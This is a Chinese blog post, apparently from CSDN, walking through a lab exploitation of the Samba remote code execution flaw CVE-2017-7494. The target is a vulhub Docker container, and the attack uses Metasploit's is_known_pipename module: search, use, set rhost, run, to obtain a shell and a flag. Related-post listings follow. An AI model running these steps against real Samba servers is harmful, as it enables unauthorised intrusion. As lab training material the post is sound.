利用Samba远程代码执行漏洞(CVE-2017-7494)获取shell

于 2024-04-02 19:00:00 发布
阅读量563 收藏 3
点赞数 10
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18780551/article/details/137267217
版权

利用Samba远程代码执行漏洞(CVE-2017-7494)获取shell

一、基础准备

在ubuntu系统中下载vulhub并且解压

漏洞文件的位置在vulhub/samba/CVE-2017-7494下

在该文件夹下右键打开控制台窗口,或者cd到该文件夹下

进入之后启动docker,记得先切换到root,或者使用sudo命令

注意:docker需要提前安装,可以查看以往教程

su

docker-compose up –d

创建成功

二、打开kali

在kali中输入msfconsole进入msf控制台

msfconsole

search CVE-2017-7494(搜索漏洞编号,查找漏洞脚本)

search CVE-2017-7494

use exploit/linux/samba/is_known_pipename(选择要使用的脚本)

use exploit/linux/samba/is_known_pipename

show options 查看需要设置的参数

show options



set rhost IP(设置为靶机的IP即可)。

set rhost IP


如果不知道靶机IP可以在靶机中输入ifconfig即可查看ip,一般eth0下的IP即为靶机IP

ifconfig



三、进行攻击


run(进行攻击),攻击完成后寻找flag

run

NAVI.electroNic
关注
  • 10
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE 2017-7494 Samba远程代码执行漏洞
BROTHERYY的博客
10-20 811
1. 漏洞描述 Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录,会导致服务器加载并执行指定的库文件。 以下Samba版本受到影响: – 3.5.0- 4.6.4 – 3.5.0- 4.5.10 – 3.5.0- 4.4.14 2. 复现环境 靶机:使用vulhub进行环境搭建 攻击机:kali 3. 漏洞复现 1.运行测试环境 docker-compose up -d 2.使用kali msf框架 msf5 > use exploit/lin
三、漏洞编号为CVE-2017-7494的复现(永恒之蓝)(Linux)(Ubuntu16.04.4)
qwsn
10-15 4042
一、漏洞分析 1.漏洞别名: CVE-2017-7494称为Linux版的永恒之蓝 2.漏洞用来做什么: 该漏洞用来,远程反弹shell并提权 3.漏洞适合的环境: Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本。 //也就是Samba 3.5.0之后的所有版本,在4.6.4/4.5.10/4.4.14修复了这个漏洞。 二、漏洞环境复现 1.相关信息: ①IP地址...
Samba远程代码执行漏洞(CVE-2017-7494)复现
m0_48520508的博客
01-06 2445
0x00简介 Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。 0x
Samba再报安全漏洞
weixin_34032621的博客
02-25 181
       今日Samba再报重大漏洞,该漏洞目前编号为CVE-2015-0240,Samba守护进程smbd里一个为初始化的指针可被远程漏洞利用,她可以让恶意的Samba客户端发送一个特定的netlogon数据包从而获得smbd运行的权限,并且smbd的默认权限还是root超级管理员,该漏洞影响Samba 3.5以及更高的版本,目前多数的GNU/Linux发行版都会受到影响,Red Hat S...
Samba 远程命令执行漏洞CVE-2017-7494
07-29 4155
Samba 远程命令执行漏洞CVE-2017-7494
linux samba漏洞,Samba远程代码执行漏洞(CVE-2017-7494)
weixin_30141959的博客
05-17 317
SambaSamba实现Windows主机与Linux服务器之间的资源共享,Linux操作系统提供了Samba服务,Samba服务为两种不同的操作系统架起了一座桥梁,使Linux系统和Windows系统之间能够实现互相通信漏洞介绍CVE-2017-74942017年5月24日Samba发布了4.6.4版本,修复严重的远程代码执行漏洞,该漏洞影响了Samba 3.5.0 之后到4.6.4/4.5....
Linux Samba远程代码执行漏洞(CVE-2017-7494)漏洞复现
旺仔Sec&blog
05-29 2081
1.该漏洞CVE-2017-7494又被称为Linux版的永恒之蓝 2.主要是利用smb上的反弹shell漏洞,进行远程代码执行 3.samba3.5.0 到4.6.4/4.5.10/4.4.14的中间版本、docker
CVE-2017-7494:SAMBA CVE-2017-7494漏洞远程漏洞利用
05-06
CVE-2017-7494 SAMBA CVE-2017-7494漏洞远程漏洞利用。细节此漏洞利用分为两个部分: 首先,它编译一个称为“ implant.c”的有效负载,并生成一个库(libimplantx32.so或libimplantx64.so),该库更改为root用户...
Linux环境下Samba远程代码执行漏洞探析.pdf
09-06
2017 年 5 月 24 日,Samba 发布了 4.6.4 版本,修复了一个严重的远程代码执行漏洞,编号 CVE-2017-7494。这是一个非常危险的漏洞,攻击者可以通过构造恶意动态链接库文件,执行任意代码获取 Samba 的权限,并可能...
cve2007-2447shell 注入.txt
06-08
samba服务 cve2007-2447shell 注入漏洞exp
ansible-role-samba:Ansible角色-Samba
01-31
ansible-role-samba:Ansible角色-Samba
LINUX-SAMBA服务配置.doc
11-29
SAMBA 安装配置需要安装多个软件包,包括 samba-common、samba-client、perl-Convert-ASN1、samba 和 xinetd。安装这些软件包可以使用 rpm 命令,例如: [root@rhel3 ~]# rpm -ivh /misc/cd/Server/samba-common-...
使用CVE-2017-7494漏洞实现Samba远程代码执行
旺仔Sec&blog
04-22 4476
在CTF比赛中,常见的比赛环境分为两种: 1.给予在同一局域网中的攻击机和靶场机器,通常以Web、Misc(杂项)、Android(移动安全)、Crypto(密码学)、Pwn(溢出题)、Reverse(逆向)可以访问攻击机,通过攻击机来渗透靶场机器,获取对应的flag值,(在一般情况下赛事举办方会提供Kali Linux作为攻击机,并且举办方提供计算机硬件设备, 无需选手携带电脑即可参加)常见于国内的各种线上线下网络安全竞赛当中,常见模式有: 攻防模式:参赛者分为两队,每队都分配一个计算环境——可能仅仅
Samba远程Shell命令注入执行漏洞
最新发布
weixin_69925635的博客
07-20 171
Samba远程Shell命令注入执行漏洞复现
linux smb 漏洞_Samba远程代码执行漏洞的实例详解
weixin_34887221的博客
12-23 1365
Samba是在Linux和UNIX系统上实现SMB协议的一个软件。2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞漏洞编号CVE-2017-7494漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。360网络安全中心 和 360信息安全部的Gear Team第一时间对该漏洞进行了分析,确认属于严重漏洞,可以造成...
Samba任意代码执行漏洞的危害
06-10
Samba是一种在Linux和UNIX系统上运行的开源软件,用于实现文件和打印机共享。如果Samba服务器存在任意代码执行漏洞,攻击者可以通过该漏洞在服务器上执行恶意代码,从而带来以下危害: 1. 数据泄露:攻击者可以利用漏洞窃取服务器上存储的敏感数据,如用户密码、金融信息等。 2. 操作系统受控:攻击者可以通过漏洞获取操作系统的控制权,从而修改或删除重要文件,破坏系统的稳定性和完整性。 3. 网络攻击:攻击者可以利用漏洞控制服务器,并将其作为跳板攻击其他网络资源,造成更广泛的攻击。 4. 恶意软件传播:攻击者可以通过漏洞在服务器上安装恶意软件,将其传播到其他系统,造成更大的安全威胁。 因此,管理员应该定期更新Samba软件,以修复可能存在的漏洞,并限制Samba服务器的访问权限,确保只有授权用户才能访问服务器。此外,还应该定期监控Samba服务器的安全状态,及时发现并处理安全事件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值